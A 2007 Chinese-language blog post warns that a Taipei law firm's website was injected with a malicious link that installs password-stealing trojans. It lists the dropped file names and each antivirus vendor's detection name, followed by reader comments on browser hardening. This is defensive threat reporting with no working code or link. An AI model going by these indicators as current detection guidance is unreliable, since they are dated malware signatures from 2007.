永然聯合法律事務所台北所網站被植入惡意連結

2007 年 06 月 27 日 – 17:39:00

永然聯合法律事務所台北所網站被植入惡意連結,此惡意程式為 PE_LOOKED 和 OnLineGames 變種,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒,等確認他們已經修復後,會在此更新訊息 (此惡意程式應該會偷帳號與密碼)。對此有興趣的網友,可以在虛擬機器上測試一下,然後,回報修復的情形,而且,幫忙通知他們,謝謝

惡意連結是放置在首頁 (其他頁面可能要仔細檢查一下囉) 中的:

執行之後,蠻慘的,請各位小心。

到目前為止 (2007/6/25 @ 11:28),下面的防毒軟體可以偵測到這些惡意檔案 (僅供參考):

2[1].exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "TrojanDropper:Win32/Agent.gen!A"
[ Kaspersky ], "Trojan-Proxy.Win32.Small.du"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
2[2].exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "TrojanDropper:Win32/Agent.gen!A"
[ Kaspersky ], "Trojan-Proxy.Win32.Small.du"
[ McAfee ], "[00000c70.EXE]:corrupted"
[ Fortinet ], "suspicious"
7[1].exe:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.te"
[ McAfee ], "New Malware.bl !!"
[ Nod32 ], "Win32/PSW.OnLineGames.YA trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Crypt.XPACK.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.wp"
LYLOADER.EXE:
[ Alpha_Gen ], "Possible_Virus"
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "[->(Upack)->[RSRCEmb]]:VirTool:Win32/Obfuscator.C"
[ Kaspersky ], "PAK:PE_Patch, PAK:UPack, Trojan-PSW.Win32.OnLineGames.nn"
[ McAfee ], "New Malware.aj !!"
[ Panda ], "Suspicious file"
[ Nod32 ], "a variant of Win32/PSW.Agent.NEC trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/PSW.OnLineGames.NN.213″
[ Norman ], "Security Risk W32/Suspicious_U.gen"
LYMANGR.DLL:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "VirTool:Win32/Obfuscator.C"
[ Kaspersky ], "PAK:UPack, Trojan-PSW.Win32.OnLineGames.nn"
[ McAfee ], "Generic PWS.j"
[ Fortinet ], "PWS.J!tr"
[ HBEDV ], "TR/PSW.OnLineGames.NN.213″
[ Norman ], "Security Risk W32/Suspicious_U.gen"
[ Ewido ], "Trojan.OnLineGames.nn"
msccrt.dll:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.es"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.NBZ trojan"
[ HBEDV ], "HEUR/Malware"
msccrt.exe:
[ Microsoft ], "PWS:Win32/Lmir.gen!J"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.es"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.YA trojan"
[ HBEDV ], "TR/Dropper.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.es"
msdebug.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
netsrvcs.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
Ravasktao.dll:
[ Alpha_Gen ], "Possible_OLGM-8″
[ Microsoft ], "PWS:Win32/Skatayo.A!dll"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.ql"
[ McAfee ], "PWS-LegMir.dll"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Spy.Gen"
[ Rising ], "Trojan.PSW.Win32.AskTao.d"
[ Ewido ], "Trojan.OnLineGames.ql"
RemoteDbg.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ McAfee ], "BackDoor-DKH"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
RichDll.dll:
[ Symantec ], "W32.Looked.AH"
[ Microsoft ], "[->(Petite 2.2)]:Virus:Win32/Viking.gen"
[ Kaspersky ], "PAK:Petite, Worm.Win32.Viking.ls"
[ McAfee ], "W32/HLLP.Philis.dll"
[ Panda ], "W32/Viking.VG.worm"
[ Nod32 ], "probably a variant of Win32/Viking virus"
[ Fortinet ], "W32/Viking.LS"
[ HBEDV ], "TR/PSW.Delf.AF.2″
[ Ewido ], "Worm.Viking.ls"
RUNDLL32.exe:
[ Alpha_Gen ], "Possible_Virus"
[ Kaspersky ], "PAK:PE_Patch, PAK:UPack, Trojan-PSW.Win32.OnLineGames.mk"
[ McAfee ], "New Malware.aj !!"
[ Fortinet ], "suspicious"
[ HBEDV ], "HEUR/Crypted"
[ Norman ], "Security Risk W32/Suspicious_U.gen"
sys174.exe:
[ Symantec ], "Infostealer"
[ Microsoft ], "TrojanDownloader:Win32/Small.gen!N"
[ Kaspersky ], "Trojan-Downloader.Win32.Agent.bkm"
[ Nod32 ], "probably a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Hijack.Explor.3546″
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Rising ], "Trojan.DL.Win32.Mnless.apg"
sys250.exe:
[ Symantec ], "Infostealer"
[ Microsoft ], "TrojanDownloader:Win32/Small.gen!N"
[ Kaspersky ], "Trojan-Downloader.Win32.Agent.bkm"
[ Nod32 ], "probably a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Hijack.Explor.3546″
[ Norman ], "[Heur
istic Sandbox detection]:Virus W32/Malware"
[ Rising ], "Trojan.DL.Win32.Mnless.apg"
test[1].exe:
[ HBEDV ], "HEUR/Malware"
TIMHost.dll:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.yn"
[ Panda ], "Trj/Agent.FTX"
[ HBEDV ], "HEUR/Malware"
[ Rising ], "Trojan.PSW.Win32.RocOnline.b"
[ Ewido ], "Trojan.OnLineGames.yn"
TIMHost.exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "PWS:Win32/Lmir.gen!J"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.yn"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.YA trojan"
[ HBEDV ], "TR/Dropper.Gen"
[ Norman ], "Trojan W32/OnLineGames.HGK"
[ Rising ], "Trojan.PSW.Win32.RocOnline.b"
[ Ewido ], "Trojan.OnLineGames.yn"
windds32.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
windhcp.ocx:
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, Trojan-Proxy.Win32.Small.fl"
[ McAfee ], "BackDoor-DKH"
[ Panda ], "Trj/Gampass.B"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
[ HBEDV ], "TR/Agent.22016.B"
WinForm.exe:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.te"
[ McAfee ], "New Malware.bl !!"
[ Nod32 ], "Win32/PSW.OnLineGames.YA trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Crypt.XPACK.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.wp"
WMIApiSrv.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ McAfee ], "BackDoor-DKH"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
0[1].exe:
[ Trend ], "TSPY_DELF.HGK"
1[1].exe:
[ Trend ], "PE_LOOKED.ACM-O"
game.com:
[ Trend ], "TSPY_DELF.HGK"
Logo1_.exe:
[ Trend ], "PE_LOOKED.ACM-O"
msimg32.dll:
[ Trend ], "TSPY_LEGMIR.BPW"
MsIMMs32.exe:
[ Trend ], "TSPY_LEGMIR.BPX"
rundl132.exe:
[ Trend ], "PE_LOOKED.ACM-O"
SERVICES.exe:
[ Trend ], "TSPY_ONLINEG.FDO"
sservet.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys211.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys263.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys270.exe:
[ Trend ], "PE_LOOKED.ACM-O"
sys321142.exe:
[ Trend ], "TSPY_ONLINEG.EEZ"
sys90.exe:
[ Trend ], "PE_LOOKED.ACM-O"
WinForm.dll:
[ Trend ], "TSPY_ONLINEG.DHY"FTE"

  1. “永然聯合法律事務所台北所網站被植入惡意連結” 目前有 2 迴響

  2. hi,roger
    我想請問像這類網站應該都是系統被入侵
    然後竄改頁面才完成的吧…
    對於這些被駭後的網站一般瀏覽網頁的user
    有沒有什麼辦法可以從根本上來預防呢??
    就像如果裝antivirs的話,病毒碼沒更新
    也是一樣抓不到.
    可不可以直接去檔iframe
    的標籤或者是有沒有軟體只要偵測到系統內經由web管道所建立的可執行檔一律擋掉或詢問呢??
    thanks!!

    By Anonymous on 2007 年 06 月 28 日 - 02:06:00

  3. 大部分都是系統有漏洞,才被植入惡意連結。

    基本上,可以將IE的安全性等級設為「高」,如果這樣做,很多東西都無法執行。另外,也可以將執行Script的功能停用,以及將下載檔案改成全部要提示。

    目前,閘道端的防毒軟體可以這樣做,但用戶端的防毒軟體,除非它們有過濾HTTP協定和file blocking的功能,否則,沒有辦法。

    By Roger on 2007 年 06 月 28 日 - 09:16:00

請在此留下您的意見

大砲開講 is proudly powered by WordPress Entries (RSS) and Comments (RSS).